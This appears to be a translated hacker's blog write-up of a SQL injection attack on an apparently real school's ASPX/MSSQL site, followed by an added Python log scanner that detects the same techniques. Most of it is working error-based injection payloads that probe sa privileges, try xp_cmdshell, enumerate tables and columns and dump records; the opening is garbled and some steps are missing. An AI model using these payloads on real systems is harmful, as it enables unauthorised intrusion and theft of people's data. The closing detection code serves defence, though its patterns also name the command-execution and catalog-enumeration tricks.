Yesterday k0baikeyou sent me a website: an ASPX + MSSQL application. (";" separates two statements, and "--" is the comment marker; anything after it is not executed. Don't ask me why I add
Step 1,
' and 1=1 → error
and '1'='1 → returns normal
The response shows sa privileges!!!!!
Excited.
Step 3,
Next, check the SQL Server version:
' and 1=convert(int,@@version)--
Fine.
Try running commands.
Various commands can be executed, but after adding an account, logging on still reports that the account does not exist. Taking the box through commands failed, so on to enumerating tables.
If xp_cmdshell is not available, search Baidu for how to restore it; if it cannot be restored, give up on that route.
Step 5,
Method 1: error messages.
' having 1=1--
When the result comes back normal, the table has no further columns.
This is how the T_ZY_TeacherInfo table was found.
So how do we find the other tables?
Now we need information_schema.tables and information_schema.columns.
Submit the following:
' and 1=convert(int,(select top 1 table_name from information_schema.tables))--
Result: T_ZY_PalaestraInfo
' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('view_r_xzbjtohj','t_ZY_PalaestraInfo','view_rm_yxcws_ch_fp','t_jh_setlessoninfo_temp_afterdelete','v_KH_TeacherSkbj1','Auto_SKBJ_JC','bjrs','brow_view','Dan_gege','hlpktly','hlplqlx')))--
Submit again:
' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Auto_SKBJ_JC' and column_name not in ('skbj')))--
Enumerate all columns:
' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Auto_SKBJ_JC' and column_name not in ('skbj','jcz','jsm','zc','stimezc','dsz','xn','xq_id','jcinfo','t_js','jcanalyse','jjs','tk_flag','tk_CDTATE','y_JCZ','y_dsz','y_JSM','y_js','Y_stimezc','y_jcinfo','y_Y_JS','sffzxk','cddw_id','kcid','analyse','skbjmc','tingk_flag','zhub','tkyy','tingkyy','classgroup','jxjdbxh','jslx','skbjxh','kc_flag')))--
Now dump the contents.
This returns the first row of the JSM column in the AUTO_SKBJ_JC table:
' and 1=convert(int,(select top 1 JSM from AUTO_SKBJ_JC))--
' and 1=convert(int,(select top 1 JSM from AUTO_SKBJ_JC where JSM not in ('105k101','105k206','105k104')))--
Method 2
First, sysdatabases is a default MSSQL system table. It holds the "master", "msdb", "mssqlweb", "tempdb" and "model" databases, whose dbid values are 1 to 5; user-created databases start at dbid=6. Changing the dbid value exposes each database name.
Submit the statement:
' and 1=(select name from master.dbo.sysdatabases where dbid=7)--
Each database name comes out in turn; I won't repeat that here.
Columns are enumerated through the default system tables: you first need the ID of the target table in the database, and then use it to pull that table's column names.
' and 1=(select count(*) from yczyxy_jwgl1db.dbo.sysobjects where xtype='U' and name='t_zy_palaestrainfo' and uid>(str(id)))--
Each column name comes out in turn:
' and 1=(select top 1 name from yczyxy_jwgl1db.dbo.syscolumns where id=823165 and name not in ('dm','jzmj','lx_id','mc'))--
Now dump the contents:
' and 1=(select MC from yczyxy_jwgl1db.dbo.T_ZY_PalaestraInfo where MC>0)--
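As an added defender-side example (not part of the original write-up), the following Python scans constructed IIS-style log lines for the request patterns both methods above rely on: the convert(int,...) error trick, information_schema and sys* catalog lookups, the having 1=1 probe, xp_cmdshell, and a quote followed by a trailing "--". The log layout and every request in it are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-style lines: date time cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2024-01-01 10:00:01 GET /teacher.aspx id=12 200
2024-01-01 10:00:05 GET /teacher.aspx id=12'+and+1%3Dconvert(int,(select+top+1+table_name+from+information_schema.tables))-- 500
2024-01-01 10:00:09 GET /teacher.aspx id=12'+having+1%3D1-- 500
2024-01-01 10:00:14 GET /teacher.aspx id=12'+and+1%3D(select+name+from+master.dbo.sysdatabases+where+dbid%3D7)-- 500
2024-01-01 10:00:20 GET /search.aspx q=select+courses 200
"""

# One rule per technique used in the write-up; all are case-insensitive where it matters.
RULES = {
    "error-based convert()": re.compile(r"convert\s*\(\s*int\s*,", re.I),
    "catalog enumeration": re.compile(
        r"information_schema\.(tables|columns)|\bsys(objects|columns|databases)\b", re.I),
    "having probe": re.compile(r"\bhaving\s+1\s*=\s*1", re.I),
    "command execution": re.compile(r"xp_cmdshell", re.I),
    "comment terminator after quote": re.compile(r"'[^']*--\s*$"),
}


def classify_query(raw_query: str) -> list[str]:
    """URL-decode one cs-uri-query value and return the names of every rule it matches."""
    decoded = unquote_plus(raw_query)
    return [name for name, rx in RULES.items() if rx.search(decoded)]


def scan_log(text: str) -> list[tuple[str, int, list[str]]]:
    """Return (uri-stem, status, matched rules) for each request matching at least one rule."""
    hits = []
    for line in text.splitlines():
        parts = line.split(" ")
        if len(parts) != 6:
            continue  # the constructed sample keeps a fixed six-field layout
        stem, query, status = parts[3], parts[4], int(parts[5])
        matched = classify_query(query)
        if matched:
            hits.append((stem, status, matched))
    return hits


if __name__ == "__main__":
    for stem, status, matched in scan_log(SAMPLE_LOG):
        print(f"{stem} ({status}): {', '.join(matched)}")
```

Correlating the matched rules with the 500 status codes is what distinguishes an error-based enumeration run from an ordinary search term such as the last sample line.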